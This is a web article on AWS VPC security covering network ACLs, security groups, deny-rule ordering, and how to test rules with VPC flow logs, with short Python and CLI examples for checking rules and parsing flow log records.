Since every VPC comes with a default NACL, many AWS users jump straight into configuring their VPC and creating subnets, leaving NACL configuration for later. The problem here is that every subnet associated with your VPC will inherit the default NACL, which allows all traffic to flow into and out of the network. Going back and building a working security policy framework later will be difficult and complicated – especially if adjustments are still being made to your subnet-level architecture. Taking the time to create custom NACLs and assign them to the appropriate subnets as you go will make it much easier to keep track of changes to your security posture as you modify your VPC moving forward.

Implement a two-tiered system where NACLs and security groups complement one another

Security groups and NACLs are designed to complement one another, yet not every AWS VPC user configures their security policies accordingly. Mapping out your assets can help you identify exactly what kind of rules need to be put in place, and may help you determine which tool is the best one for each particular case. For example, imagine you have a two-tiered web application with web servers in one security group and a database in another. You could establish inbound NACL rules that allow external connections to your web servers from anywhere in the world (enabling port 443 connections) while strictly limiting access to your database (by only allowing port 3306 connections for MySQL).

Look out for ineffective, redundant, and misconfigured deny rules

Amazon recommends placing deny rules first in the sequential list of rules that your NACL enforces. Since you're likely to enforce multiple deny rules per NACL (and multiple NACLs throughout your VPC), you'll want to pay close attention to the order of those rules, looking for conflicts and misconfigurations that will impact your security posture.
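One concrete conflict to look for is a "shadowed" deny: a deny rule whose CIDR is already covered by a lower-numbered allow, so it can never fire. A simplified checker, using hypothetical rule numbers and CIDRs:

```python
# Detect deny rules shadowed by an earlier, broader allow.
# Rule numbers and CIDRs are hypothetical; matching is simplified
# to pure CIDR containment.

import ipaddress

RULES = [
    (100, "allow", "0.0.0.0/0"),
    (200, "deny",  "198.51.100.0/24"),  # shadowed by rule 100
]

def shadowed_denies(rules):
    """Return (deny_rule, shadowing_allow_rule) number pairs."""
    findings = []
    for num, action, cidr in sorted(rules):
        if action != "deny":
            continue
        net = ipaddress.ip_network(cidr)
        for earlier_num, earlier_action, earlier_cidr in sorted(rules):
            if earlier_num >= num:
                break
            if (earlier_action == "allow" and
                    net.subnet_of(ipaddress.ip_network(earlier_cidr))):
                findings.append((num, earlier_num))
    return findings

print(shadowed_denies(RULES))  # [(200, 100)]
```

Here the fix is simply to renumber the deny below 100, which is exactly Amazon's advice to place deny rules first.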
Similarly, you should pay close attention to the way security group rules interact with your NACLs. Even misconfigurations that are harmless from a security perspective may end up impacting the performance of your instance, or causing other problems. Regularly reviewing your rules is a good way to prevent these mistakes from occurring.

Limit outbound traffic to the required ports or port ranges

When creating a new NACL, you have the ability to apply inbound or outbound restrictions. There may be cases where you want to set outbound rules that allow traffic from all ports. Be careful, though: this may introduce vulnerabilities into your security posture. It's better to limit access to the required ports, or to specify the corresponding port range for outbound rules. This applies the principle of least privilege to outbound traffic and limits the risk of unauthorized access that may occur at the subnet level.

Test your security posture frequently and verify the results

How do you know if your particular combination of security groups and NACLs is optimal? Testing your architecture is a vital step towards making sure you haven't left out any glaring vulnerabilities. It also gives you a good opportunity to address misconfiguration risks. This doesn't always mean actively running penetration tests with experienced red team consultants, although that's a valuable way to ensure best-in-class security. It also means taking the time to validate your rules by running small tests with an external device. Consider using VPC flow logs to trace the way your rules direct traffic and using that data to improve your work.

How to diagnose security group rules and NACL rules with flow logs

Flow logs allow you to verify whether your firewall rules follow security best practices effectively. You can follow data ingress and egress and observe how data interacts with your AWS security rule architecture at each step along the way.
This gives you clear visibility into how efficient your route tables are, and may help you configure your internet gateways for optimal performance. Before you can use the flow log CLI, you will need to create an IAM role that includes a policy granting users the permission to create, configure, and delete flow logs. Flow logs are available at three distinct levels, each accessible through its own console:
- Network interfaces
- VPCs
- Subnets

You can use the ping command from an external device to test the way your instance's security group and NACLs interact. Your security group rules (which are stateful) will allow the response ping from your instance to go through. Your NACL rules (which are stateless) will not allow the outbound ping response to travel back to your device. You can look for this activity through a flow log query. Here is a quick tutorial on how to create a flow log query to check your AWS security policies. First you'll need to create a flow log in the AWS CLI. This example captures all traffic for a specified network interface and delivers the flow logs to a CloudWatch log group, with permissions specified in the IAM role:

aws ec2 create-flow-logs \
  --resource-type NetworkInterface \
  --resource-ids eni-1235b8ca123456789 \
  --traffic-type ALL \
  --log-group-name my-flow-logs \
  --deliver-logs-permission-arn arn:aws:iam::123456789101:role/publishFlowLogs

Assuming your test pings represent the only traffic flowing between your external device and EC2 instance, you'll get two records that look like this:

2 123456789010 eni-1235b8ca123456789 203.0.113.12 172.31.16.139 0 0 1 4 336 1432917027 1432917142 ACCEPT OK
2 123456789010 eni-1235b8ca123456789 172.31.16.139 203.0.113.12 0 0 1 4 336 1432917094 1432917142 REJECT OK

To parse this data, you'll need to familiarize yourself with flow log syntax.
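As a quick illustration, a version-2 record like the samples above can be split into its 14 named fields with a few lines of Python (the field names here follow the flow log syntax; the record is the sample REJECT record from the text):

```python
# Parse a version-2 VPC flow log record into its 14 default fields.

FIELDS = ["version", "account_id", "interface_id", "srcaddr", "dstaddr",
          "srcport", "dstport", "protocol", "packets", "bytes",
          "start", "end", "action", "log_status"]

def parse_flow_log(record):
    return dict(zip(FIELDS, record.split()))

rec = parse_flow_log(
    "2 123456789010 eni-1235b8ca123456789 172.31.16.139 203.0.113.12 "
    "0 0 1 4 336 1432917094 1432917142 REJECT OK")

print(rec["action"])    # REJECT
print(rec["protocol"])  # 1 (ICMP, per the IANA protocol numbers)
```

Each of these fields is described in turn below.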
Default flow log records contain 14 fields, although expanded custom queries can return more than double that number:
- Version tells you the version currently in use. Default flow log requests use version 2; expanded custom requests may use version 3 or 4.
- Account-id tells you the account ID of the owner of the network interface that traffic is traveling through. The record may display as unknown if the network interface is part of an AWS service like a Network Load Balancer.
- Interface-id shows the unique ID of the network interface for the traffic currently under inspection.
- Srcaddr shows the source of incoming traffic, or the address of the network interface for outgoing traffic. For a network interface, this is always its private IPv4 address.
- Dstaddr shows the destination of outgoing traffic, or the address of the network interface for incoming traffic. For a network interface, this is always its private IPv4 address.
- Srcport is the source port for the traffic under inspection.
- Dstport is the destination port for the traffic under inspection.
- Protocol is the corresponding IANA traffic protocol number.
- Packets is the number of packets transferred.
- Bytes is the number of bytes transferred.
- Start shows the time when the first data packet was received. This could be up to one minute after the network interface transmitted or received the packet.
- End shows the time when the last data packet was received. This can be up to one minute after the network interface transmitted or received the data packet.
- Action describes what happened to the traffic under inspection: ACCEPT means the traffic was allowed to pass; REJECT means the traffic was blocked, typically by security groups or NACLs.
- Log-status confirms the status of the flow log: OK means data is logging normally.
NODATA means no network traffic to or from the network interface was detected during the specified interval; SKIPDATA means some flow log records are missing, usually due to internal capacity constraints or other errors.

Going back to the example above, the flow log output shows that a user sent a command from a device with the IP address 203.0.113.12 to the network interface's private IP address, which is 172.31.16.139. The security group's inbound rules allowed the ICMP traffic through, producing an ACCEPT record. However, the NACL did not let the ping response go through, because it is stateless. This generated the REJECT record that followed immediately after. If you configure your NACL to permit outbound ICMP traffic and run this test again, the second flow log record will change to ACCEPT.

Amazon Web Services (AWS) is one of the most popular options for organizations looking to migrate their business applications to the cloud. It's easy to see why: AWS offers high-capacity, scalable and cost-effective storage, and a flexible, shared responsibility approach to security. Essentially, AWS secures the infrastructure, and you secure whatever you run on that infrastructure. However, this model does throw up some challenges. What exactly do you have control over? How can you customize your AWS infrastructure so that it isn't just secure today, but will continue delivering robust, easily managed security in the future?

The basics: security groups

AWS offers virtual firewalls to organizations, for filtering traffic that crosses their cloud network segments. The AWS firewalls are managed using a concept called Security Groups. These are the policies, or lists of security rules, applied to an instance – a virtualized computer in the AWS estate.
AWS Security Groups are not identical to traditional firewalls, and they have some unique characteristics and functionality that you should be aware of. We've discussed them in detail in video lesson 1: the fundamentals of AWS Security Groups, but the crucial points to be aware of are as follows. First, security groups do not deny traffic – that is, all the rules in security groups are positive, and allow traffic. Second, while security group rules can be set to specify a traffic source, or a destination, they cannot specify both on the same rule. This is because AWS always sets the unspecified side (source or destination) as the instance to which the group is applied. Finally, a single security group can be applied to multiple instances, or multiple security groups can be applied to a single instance: AWS is very flexible. This flexibility is one of the unique benefits of AWS, allowing organizations to build bespoke security policies across different functions and even operating systems, mixing and matching them to suit their needs.

Adding Network ACLs into the mix

To further enhance and enrich its security filtering capabilities, AWS also offers a feature called Network Access Control Lists (NACLs). Like security groups, each NACL is a list of rules, but there are two important differences between NACLs and security groups. The first difference is that NACLs are not directly tied to instances, but are tied to the subnet within your AWS virtual private cloud that contains the relevant instance. This means that the rules in a NACL apply to all of the instances within the subnet, in addition to all the rules from the security groups. So a specific instance inherits all the rules from the security groups associated with it, plus the rules from the NACL which is optionally associated with the subnet containing that instance. As a result, NACLs have a broader reach, and affect more instances than a security group does.
The second difference is that NACLs can be written to include an explicit action, so you can write 'deny' rules – for example, to block traffic from a particular set of IP addresses which are known to be compromised. The ability to write 'deny' actions is a crucial part of NACL functionality.

It's all about the order

Consequently, when you have the ability to write both 'allow' rules and 'deny' rules, the order of the rules becomes important. If you switch the order between a 'deny' and an 'allow' rule, you potentially change your filtering policy quite dramatically. To manage this, AWS uses the concept of a 'rule number' within each NACL. By specifying the rule number, you can set the correct order of the rules for your needs: you can choose which traffic you deny at the outset, and which you then actively allow. As such, with NACLs you can manage security tasks in a way that you cannot do with security groups alone. However, we did point out earlier that an instance inherits security rules from both the security groups and the NACLs – so how do these interact? The order in which rules are evaluated is as follows. For inbound traffic, AWS's infrastructure first assesses the NACL rules. If traffic gets through the NACL, then all the security groups that are associated with that specific instance are evaluated; the order in which this happens within and among the security groups is unimportant, because they are all 'allow' rules. For outbound traffic, this order is reversed: the traffic is first evaluated against the security groups, and then finally against the NACL that is associated with the relevant subnet. You can see me explain this topic in person in my new whiteboard video:
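The inbound evaluation order can be sketched end-to-end: the subnet NACL's numbered rules are checked first (first match wins), and only then the union of security-group allow rules. This is a simplified model with hypothetical rule numbers, CIDRs, and ports, not AWS's actual implementation:

```python
# Inbound evaluation order in miniature: NACL first (ordered, can deny),
# then security groups (unordered union of allows).
# All rule values below are hypothetical.

NACL = [(90, "deny", "198.51.100.0/24"), (100, "allow", "0.0.0.0/0")]
SG   = {("tcp", 443)}  # allow HTTPS from anywhere (simplified)

def inbound(src_cidr, protocol, port):
    for _number, action, cidr in sorted(NACL):
        if cidr in (src_cidr, "0.0.0.0/0"):
            if action == "deny":
                return "blocked by NACL"
            break  # NACL allows; fall through to the security groups
    if (protocol, port) in SG:
        return "allowed"
    return "blocked by security group"

print(inbound("198.51.100.0/24", "tcp", 443))  # blocked by NACL
print(inbound("203.0.113.0/24",  "tcp", 443))  # allowed
print(inbound("203.0.113.0/24",  "tcp", 22))   # blocked by security group
```

For outbound traffic the two checks simply run in the reverse order, with the NACL evaluated last on the way out of the subnet.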




